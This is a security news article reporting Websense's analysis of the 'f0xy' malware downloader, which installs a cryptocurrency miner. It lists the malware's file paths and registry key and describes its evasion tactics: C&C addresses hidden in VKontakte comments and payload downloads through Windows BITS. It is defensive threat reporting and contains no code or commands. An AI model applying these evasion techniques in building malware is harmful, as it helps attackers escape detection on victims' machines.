f0xy CPUminer malware improved with evasion techniques

Pierluigi Paganini January 31, 2015

Researchers at Websense are investigating on the evolution of the financial ‘f0xy’ malware which is improved with new interesting features.

Security experts at Websense have spotted a new strain of malware dubbed “f0xy” that leverages legitimate websites and web services in order to run malicious activities. A first sample of f0xy discovered by Websense is dated January 13, 2015, but the experts confirmed that the malware has been improved since then. f0xy originally worked only on Windows Vista and later versions Microsoft OS, meanwhile recent variant are effective also on Windows XP.

The name f0xy was assigned because the presence of this particular string has been found in its executables and the registries it creates.

File Names
%appdata%\Microsoft\svchost.exe
%appdata%\Microsoft\f0xyupdate.exe
%appdata%\Microsoft\Bot_ID
Registry Keys
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Name: f0xy

f0xy code

The f0xy  malware is able to dynamically change its command-and-control (C&C) and download and execute arbitrary files, the authors have dedicated particular attention to the techniques of evasion to hide the malicious code to victims and security firms.

A first sample of the dropper used by the malware was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by the researchers,  at this moment the detection rate is slightly increasing (24/57 ), but it’s still low.

“Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named ‘f0xy’, is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy’s evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft’s Background Intelligent Transfer Service to download files.” Websense researcher Nick Griffin explained in a blog post.

Very interesting the technique adopted by f0xy to dynamically change the C&C, the operators use an encoded string posted through a specific VKontakte profile pointed by the malware. The URL of the command & control server is posted as a comment by this profile.

Once the f0xy downloader finds itself on a machine it exploits the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. The choice is very effective because BITS is used by Microsoft systems for transferring files between a client and a server using idle network bandwidth, a process that was not considered suspicious by antivirus solutions.

“The f0xy downloader calls upon bitsadmin.exe to download its payloads, which is the Microsoft Background Intelligent Transfer Service (BITS). BITS provides a way of using idle bandwidth to perform file transfers, meaning that bandwidth requirements from other applications are not interrupted or interfered with. Many Windows services rely upon this service, including Windows Update and Windows Defender.” continues the post.

The experts confirmed the financial motivation of the operators behind f0xy campaign, the f0xy variant uncovered by Websense is CPU Miner working on 64-bit version architecture. Threat actors use the CoinMine.pw mining pool to coordinate mining activities run by the infected machines.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Pierluigi Paganini

(Security Affairs – f0xy, malware)



you might also like

leave a comment